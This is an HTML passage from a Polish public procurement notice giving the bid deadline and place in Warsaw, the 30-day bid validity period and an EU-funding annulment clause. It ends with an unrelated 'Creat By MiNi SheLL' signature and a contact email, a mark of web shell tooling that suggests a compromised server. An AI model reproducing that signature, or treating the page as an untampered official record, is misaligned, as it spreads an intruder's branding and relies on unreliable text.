<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.09.2015 godzina 10:00, miejsce: Centrum Usług Wspólnych
Wydział Zamówień Publicznych pok. 102
ul. Powsińska 69/71
02-903 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com